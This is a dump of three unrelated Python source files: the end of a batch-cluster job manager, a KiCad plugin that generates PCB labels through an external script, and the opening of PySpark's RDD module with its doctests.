logger.debug("["+line.split()[0].strip()+"-"+line.split()[1].strip()+"]"+status2)
if status2 == 'null' or line.split()[0].strip() == '0':
idle += 1
elif status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
done += 1
self.submitted -= 1
if not self.check_termination(line.split()[1]):
idle +=1
else:
fail += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
id = self.submitted_ids[0]
if id != 0 :
cmd = "htcaas-job-cancel -m %s" % str(id)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
class MPICluster(Cluster):
""" Dummy cluster implementation for now, to be used when using MPI. """
name = 'MPICluster'
identifier_length = 10
def __init__(self, mpi_rank, mpi_size, **opts):
"""Init the cluster"""
self.mpi_rank = mpi_rank
self.nb_core = mpi_size
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplementedError, 'No implementation of submit in cluster type \'%s\'' % self.name
#@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
raise NotImplementedError, 'No implementation of submit2 in cluster type \'%s\'' % self.name
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wrap the cluster submition with cluster independant
method should not be overwritten (but for DAG type submission)"""
raise NotImplementedError, 'No implementation of cluster_submit in cluster type \'%s\'' % self.name
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
raise NotImplementedError, 'No implementation of control in cluster type \'%s\'' % self.name
def control_one_job(self, pid):
""" control the status of a single job with it's cluster id """
raise NotImplementedError, 'No implementation of control_one_job in cluster type \'%s\'' % self.name
def get_jobs_identifier(self, path, second_path=None):
"""get a unique run_name for all the jobs helps to identify the runs
in the controller for some cluster."""
raise NotImplementedError, 'No implementation of get_jobs_identifier in cluster type \'%s\'' % self.name
#@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait that all job are finish.
if minimal_job set, then return if idle + run is lower than that number"""
raise NotImplementedError, 'No implementation of wait in cluster type \'%s\'' % self.name
def check_termination(self, job_id):
"""Check the termination of the jobs with job_id and relaunch it if needed."""
raise NotImplementedError, 'No implementation of check_termination in cluster type \'%s\'' % self.name
#@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
raise NotImplementedError, 'No implementation of launch_and_wait in cluster type \'%s\'' % self.name
def remove(self, *args, **opts):
""" """
raise NotImplementedError, 'No implementation of remove in cluster type \'%s\'' % self.name
#@store_input()
def metasubmit(self, me_dir):
raise NotImplementedError, 'No implementation of metasubmit in cluster type \'%s\'' % self.name
from_name = {'condor':CondorCluster, 'pbs': PBSCluster, 'sge': SGECluster,
'lsf': LSFCluster, 'ge':GECluster, 'slurm': SLURMCluster,
'htcaas':HTCaaSCluster, 'htcaas2':HTCaaS2Cluster}
onecore=MultiCore(1) # create a thread to run simple bash job without having to
#fork the main process
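# Illustrative usage sketch (not part of the original module): a typical caller looks up
# a scheduler back-end by name in `from_name` and then drives it through the common
# Cluster interface. The queue name and paths below are hypothetical.
#
#   cluster = from_name['slurm'](cluster_queue='short')
#   job_id = cluster.submit('./run.sh', argument=['1'], cwd='/path/to/run_dir')
#   idle, run, finish, fail = cluster.control('/path/to/run_dir')
#   cluster.remove()   # cancel anything still queued or running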
|
__init__.py
|
import os
import sys
import subprocess
import threading
import time
import wx
import wx.aui
from wx import FileConfig
import pcbnew
from dialog import Dialog
def check_for_bom_button():
# From Miles McCoo's blog
# https://kicad.mmccoo.com/2017/03/05/adding-your-own-command-buttons-to-the-pcbnew-gui/
def find_pcbnew_window():
windows = wx.GetTopLevelWindows()
pcbneww = [w for w in windows if "pcbnew" in w.GetTitle().lower()]
if len(pcbneww) != 1:
return None
return pcbneww[0]
def callback(_):
plugin.Run()
path = os.path.dirname(__file__)
while not wx.GetApp():
time.sleep(1)
bm = wx.Bitmap(path + '/icon.png', wx.BITMAP_TYPE_PNG)
button_wx_item_id = 0
from pcbnew import ID_H_TOOLBAR
while True:
time.sleep(1)
pcbnew_window = find_pcbnew_window()
if not pcbnew_window:
continue
top_tb = pcbnew_window.FindWindowById(ID_H_TOOLBAR)
if button_wx_item_id == 0 or not top_tb.FindTool(button_wx_item_id):
top_tb.AddSeparator()
button_wx_item_id = wx.NewId()
top_tb.AddTool(button_wx_item_id, "KiBuzzard", bm,
"Execute Buzzard script", wx.ITEM_NORMAL)
top_tb.Bind(wx.EVT_TOOL, callback, id=button_wx_item_id)
top_tb.Realize()
class KiBuzzardPlugin(pcbnew.ActionPlugin, object):
config_file = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
buzzard_path = os.path.join(os.path.dirname(__file__), '..', 'deps', 'buzzard')
def __init__(self):
super(KiBuzzardPlugin, self).__init__()
self.name = "Create Labels"
self.category = "Modify PCB"
self.pcbnew_icon_support = hasattr(self, "show_toolbar_button")
self.show_toolbar_button = True
icon_dir = os.path.dirname(os.path.dirname(__file__))
self.icon_file_name = os.path.join(icon_dir, 'icon.png')
self.description = "Create Labels"
self.config = FileConfig(localFilename=self.config_file)
self._pcbnew_frame = None
def defaults(self):
pass
def Run(self):
buzzard_script = os.path.join(self.buzzard_path, 'buzzard.py')
if self._pcbnew_frame is None:
self._pcbnew_frame = [x for x in wx.GetTopLevelWindows() if 'pcbnew' in x.GetTitle().lower() and not 'python' in x.GetTitle().lower()][0]
def run_buzzard(str):
import re
str = str + ' -o ki -stdout'
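# split the command line into double-quoted chunks or bare tokens, then strip the surrounding quotes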
args = [a.strip('"') for a in re.findall('".+?"|\S+', str)]
# Execute Buzzard
process = None
if sys.platform.startswith('linux'):
process = subprocess.Popen(['python', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
process = subprocess.Popen(['C:\\Python38\\python.exe', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
if stderr:
wx.MessageBox(stderr, 'Error', wx.OK | wx.ICON_ERROR)
# check for errors
error_line = [s for s in stderr.decode('utf8').split('\n') if 'error' in s]
if len(error_line) > 0:
wx.MessageBox(error_line[0], 'Error', wx.OK | wx.ICON_ERROR)
else:
# Copy footprint into clipboard
if sys.platform.startswith('linux'):
clip_args = ['xclip', '-sel', 'clip', '-noutf8']
else:
clip_args = ['clip.exe']
process = subprocess.Popen(clip_args, stdin=subprocess.PIPE)
process.communicate(stdout)
dlg.EndModal(wx.ID_OK)
dlg = Dialog(self._pcbnew_frame, self.config, self.buzzard_path, run_buzzard)
try:
if dlg.ShowModal() == wx.ID_OK:
# Set focus to main window and execute a Paste operation
self._pcbnew_frame.Raise()
wx.Yield()
keyinput = wx.UIActionSimulator()
keyinput.Char(ord("V"), wx.MOD_CONTROL)
finally:
self.config.Flush()
dlg.Destroy()
plugin = KiBuzzardPlugin()
plugin.register()
# Add a button the hacky way if the plugin button is not supported
# in pcbnew, unless this is Linux.
if not plugin.pcbnew_icon_support and not sys.platform.startswith('linux'):
t = threading.Thread(target=check_for_bom_button)
t.daemon = True
t.start()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns a consistent hash code for builtin types, especially
for None and tuples containing None.
The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
A bounded value is generated by an approximate job, with a confidence level
and low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of strings in doctests, to make them work
in both Python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
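# Illustration (not part of the upstream file): a Partitioner simply maps a key to a
# partition index by applying partitionFunc and reducing modulo numPartitions, e.g.
#   p = Partitioner(4, portable_hash)
#   p("spark") == portable_hash("spark") % 4   # always an int in range(4)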
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
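# Worked example (illustrative numbers only): sampling 100 rows out of 10000 without
# replacement gives p = 0.01, gamma = -ln(0.00005)/10000 ~= 9.9e-4, and therefore
# q ~= 0.01 + 9.9e-4 + sqrt(gamma^2 + 2*gamma*0.01) ~= 0.0156, i.e. roughly 156 rows
# are expected to be drawn so that >= 100 survive with probability ~0.9999.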
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
@ignore_unicode_prefix
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip(b'\n').decode('utf-8') for x in iter(pipe.stdout.readline, b''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
